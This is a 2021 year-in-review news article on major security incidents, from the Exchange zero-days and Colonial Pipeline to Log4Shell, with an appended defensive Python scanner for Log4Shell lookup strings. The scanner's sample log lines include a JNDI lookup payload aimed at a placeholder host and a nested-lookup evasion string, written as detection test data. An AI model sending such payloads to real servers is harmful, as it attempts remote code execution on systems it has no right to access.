It’s been a whirlwind of a year, with the very worst of COVID-19 sandwiching Facebook’s annual PR crisis and a litany of cyber security tales from the deep. Indeed, security teams are still scrambling daily to wrestle with the number of threats facing businesses, while ransomware gangs continue to ransack their way across the globe.
The likes of REvil and Emotet have terrorised businesses, while also sporadically and unexpectedly shutting down amid mounting pressure from law enforcement. From crippling attacks on critical national infrastructure to the persistent exploitation of zero-day vulnerabilities, most recently in the form of the Log4Shell vulnerability, we round up the most shocking cyber security scandals of the past 12 months.
Microsoft Exchange under siege
It’s been a torrid time for Microsoft Exchange this year, with zero-day exploits and vulnerabilities emerging from every corner.
The problems began in March, when Microsoft announced it had discovered what it believed to be the Chinese hacking group Hafnium executing a sophisticated attack that chained four previously undisclosed zero-day flaws targeting on-premises Exchange servers. Hafnium gained access using these vulnerabilities and stolen passwords, then planted web shells on the compromised servers, which allowed it to exfiltrate email data remotely.
It’s estimated a total of 30,000 servers were compromised across the world, including 7,000 in the UK. Patches were soon released for large organisations before a one-click patch was issued for smaller businesses without dedicated IT teams.
Unfortunately, this was shortly followed by a series of additional zero-days, including three the NSA disclosed in April, before ProxyToken was unleashed in August. This flaw, again hastily patched, could have been abused to steal personal information and perform configuration actions on target mailboxes. Zero Day Initiative experts said, at the time, this could have allowed a hacker to gather and exfiltrate all email addresses in a person’s inbox, which would then be harnessed in phishing campaigns. The ProxyLogon exploit was subsequently at the centre of various attacks, with Epsilon Red targeting servers in June. At least ten groups have since abused the Hafnium exploit chain, with Qakbot and SquirrelWaffle malspam most recently spreading via unpatched servers.
Facebook’s first major snafu of the year
Facebook, once more, endured a crisis-laden year, with a humongous data scandal setting the tone for a rocky few months that eventually led to the damaging revelations detailed by whistleblower Frances Haugen.
On 3 April, somebody uploaded a database containing the personal information of 533 million users to a popular, publicly accessible hacking forum. This represented a fifth of Facebook’s user base, with most of the affected users in the UK, US, and India. The leak included phone numbers, full names, previous locations, birth dates, relationship statuses, biographies, and, in some cases, email addresses. Experts, at the time, said the information would likely be used for social engineering campaigns, hacking, and marketing purposes.
Facebook initially explained that the hackers scraped the data from its servers by exploiting a misconfiguration in its contact importer. This was, in fact, a vulnerability the firm had patched in 2019; it knew the data had been compromised, but the situation was out of its hands. The unknown hacker then, last year, compiled the database from this stolen information and set up a business on Telegram whereby users paid a small fee to query the database and find phone numbers linked to Facebook profiles. Despite this endeavour, the hacker changed tack and dumped it all online in April.
Colonial’s Pipeline runs dry
The double-extortion ransomware siege on Colonial Pipeline was among the most widely-reported attacks of 2021 due to the sheer scale of impact it had on US infrastructure.
The firm managing the 5,500-mile pipeline between Texas and New York, which delivers 45% of the East Coast’s fuel, was brought to its knees for six days in May, with supplies cut off. Russian-linked DarkSide took credit; the group had, the previous month, sold information about its attacks to stock traders.
DarkSide also threatened to leak information from the 100GB of data it stole before locking down the company’s systems. For consumers, limited fuel supply meant US residents had to physically compete with one another for resources, as a hoarding craze took hold.
Before long, Colonial Pipeline went against cyber security best practice and paid the ransom, reported to be $4.4 million (roughly £3.3 million). The Department of Justice (DoJ) eventually recovered most of this sum, but the fear of future attacks catalysed a shift in focus for policymakers. Stricter rules around securing pipelines from cyber attacks were swiftly introduced, and the incident prompted the Biden administration to promote ransomware to ‘terrorism’ status. The attack was so bad that even DarkSide was forced to change its operation, namely introducing a moderation process following a massive backlash.
Kaseya supply chain attack cripples millions of devices
The summer months were marred with yet another mass-scale cyber attack, this time on Kaseya’s VSA product, a tool Managed Service Providers (MSPs) use to monitor their clients’ IT needs. The culprit, REvil, targeted a zero-day flaw in VSA specifically due to functionality that allowed IT managers to push updates to clients without intervention.
Ironically, Kaseya had been working with Dutch security firm DIVD CSIRT at the time to patch the flaw REvil eventually exploited; this was a race against the clock the researchers unfortunately lost. Kaseya first announced 50 customers were affected but, in reality, the ransomware hit more than 1,000 victims and crippled more than a million devices. This isn’t to mention REvil’s gargantuan reported ransom demand of $70 million (roughly £52 million) for supplying the universal decryptor.
What followed was a total shut down of VSA servers, with researchers eventually patching the three zero-day flaws that facilitated the attack. Opportunistic cyber criminals, though, persisted by capitalising on the mayhem with specialised phishing campaigns purporting to supply system-fixing updates from Kaseya. Weeks later, Kaseya obtained a decryptor through a third party, insisting no payment was made.
Curiously, REvil shut down days after the attack; its servers and website were rendered offline. The group, however, returned in September by reopening its ‘Happy Blog’ – a site on which victims who refuse to pay are named and ‘shamed’ – before vanishing again in light of a Europol-led sting operation.
PrintNightmare: A comedy of errors
The aptly-named PrintNightmare fiasco arose at the start of July after a devastating misunderstanding led to a reputable cyber security vendor, Sangfor, inadvertently publishing a working exploit for an unpatched vulnerability.
Microsoft had initially patched a privilege escalation vulnerability in its Print Spooler component on 8 June as part of its routine Patch Tuesday wave of updates. The firm, however, two weeks later upgraded the severity of the bug to remote code execution (RCE). The vulnerability in question allowed attackers to install applications, view, change or delete data, or create new accounts with full privileges on targeted devices.
Sangfor researchers, meanwhile, were conducting their own research into Print Spooler vulnerabilities ahead of a presentation at the Black Hat cyber security conference in August. When Microsoft upgraded the severity of the now-patched Print Spooler flaw, the researchers published a proof-of-concept exploit for an RCE flaw ahead of schedule, mistakenly believing it to be the same vulnerability Microsoft had patched in June.
By the time Sangfor realised the mistake and took its report down, the exploit was already circulating across the hacking community.
Microsoft promptly issued a patch, but this ultimately proved insufficient after another researcher published a way around it. The firm then released a working patch on its second attempt on 13 July, alongside fixes for 117 other flaws.
Emotet buried by Europol – then rises from the ashes
Emotet was undoubtedly one of the most devastating strains of malware ever authored; at its peak, it provided an access point for up to 70% of malware strains in global circulation. The infamous banking Trojan’s significance and effectiveness was incontrovertible, but Christmas came late for security teams in January as a coordinated law enforcement effort, led by Europol, took it down for good.
That was, at least, the line they touted at the time. Europol officers, alongside colleagues from the UK, US, and France, seized several hundred servers comprising Emotet’s infrastructure. It was a huge relief, given the malware was, as of a month earlier, affecting up to 100,000 users per day. German authorities later used the seized Emotet servers to uninstall the Trojan from infected devices – a dagger to the heart.
This brief period of bliss lasted just six months, however, with researchers discovering a retooled iteration of Emotet re-emerging in the wild. Back with better-protected code and infrastructure, security experts are now, once again, on high alert, warning staff of the telltale signs of Emotet-infected emails. Whether this resurgent strain becomes as prolific as its predecessor remains to be seen, but it’s certainly a comeback that’s sent shockwaves through the security community.
Log4Shell is a genuine nightmare before Christmas
Discovered just weeks before the year’s end as a glitch in Minecraft, of all places, chatter continues to run rife in the infosec community about just how dangerous the flaw known as Log4Shell could be.
Log4Shell is a zero-day vulnerability in the popular log4j 2 library, a logger that’s almost ubiquitous in Java applications and enterprise products worldwide. Apache frameworks including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink are thought to be particularly vulnerable, and further vulnerable products have been identified every day since the flaw’s discovery on 9 December.
While the vast majority of products written in Java are thought to be vulnerable to the RCE tracked as CVE-2021-44228, the true breadth of the attack surface is yet to be confirmed and isn’t likely to be fully understood for months, according to experts. Attackers, however, can certainly use a long-known exploitation method, Java Naming and Directory Interface (JNDI) injection, to achieve RCE.
There are currently no known major exploitations of the vulnerability, but early evidence points to Mirai botnets being built from vulnerable infrastructure, with other attacks likely. Check Point researchers observed more than 800,000 attack attempts using the vulnerability within 72 hours of disclosure. With patches available, it’s set to be a turbulent and anxious few weeks for cyber security professionals across the globe as the industry watches the prospective horrors unfold.
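As an added illustration of what defenders are hunting for in the wake of Log4Shell (this is example code written for this page, not code from the article, from Apache or from any vendor): the vulnerability is triggered when attacker-controlled text containing a log4j lookup such as `${jndi:...}` reaches a log message, so a first-pass detection is to scan web server access logs for that pattern. The script below runs over a handful of constructed Apache-style log lines, URL-decodes each line first, and flags lines containing a JNDI lookup or a lookup nested inside another lookup, while leaving an ordinary `${...}` placeholder alone. The host `example.invalid`, the IP addresses and the log lines are all constructed for the example.

```python
"""Scan web-server log lines for log4j lookup strings associated with
CVE-2021-44228 (Log4Shell). Added example; not code from the article."""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote

# A "${jndi:...}" lookup is the trigger for Log4Shell; match it in any case
# and tolerate stray whitespace around the keyword.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# A lookup opened inside another lookup ("${ ... ${") is almost never
# legitimate in request data and is a generic sign that someone is trying to
# disguise a lookup string, so it is flagged even when "jndi" is not visible.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")


@dataclass
class Finding:
    line_no: int   # 1-based position in the input
    reason: str    # which rule fired
    excerpt: str   # trimmed copy of the raw offending line


def scan_line(line: str) -> Optional[str]:
    """Return the name of the rule that matched, or None for a clean line.

    The line is URL-decoded first so that percent-encoded request data is
    inspected in the same form the application would have logged it.
    """
    decoded = unquote(line)
    if JNDI_LOOKUP.search(decoded):
        return "jndi lookup"
    if NESTED_LOOKUP.search(decoded):
        return "nested lookup"
    return None


def scan_log(lines) -> List[Finding]:
    """Apply scan_line to every line and collect the hits."""
    findings = []
    for n, line in enumerate(lines, start=1):
        reason = scan_line(line)
        if reason is not None:
            findings.append(Finding(n, reason, line.strip()[:120]))
    return findings


# Constructed Apache-style access log lines for the example; "example.invalid"
# is a reserved placeholder host, not a real indicator.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:08:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.5 - - [10/Dec/2021:08:02:11 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:02:40 +0000] "GET /?q=${${lower:test}} HTTP/1.1" 200 77 "-" "curl/7.68.0"',
    '10.0.0.7 - - [10/Dec/2021:08:03:00 +0000] "GET /price?amount=${total} HTTP/1.1" 200 30 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason}: {f.excerpt}")
```

Run against the constructed sample, the scanner reports lines 2 and 4 and stays quiet on line 5, whose single `${total}` placeholder is the kind of benign token that would otherwise drown a team in false positives. A regex pass like this is a triage aid, not a substitute for patching: it only sees what the web tier logged, and lookup strings can arrive through any field an application ends up logging, so the durable fix remains updating log4j 2 on every affected product.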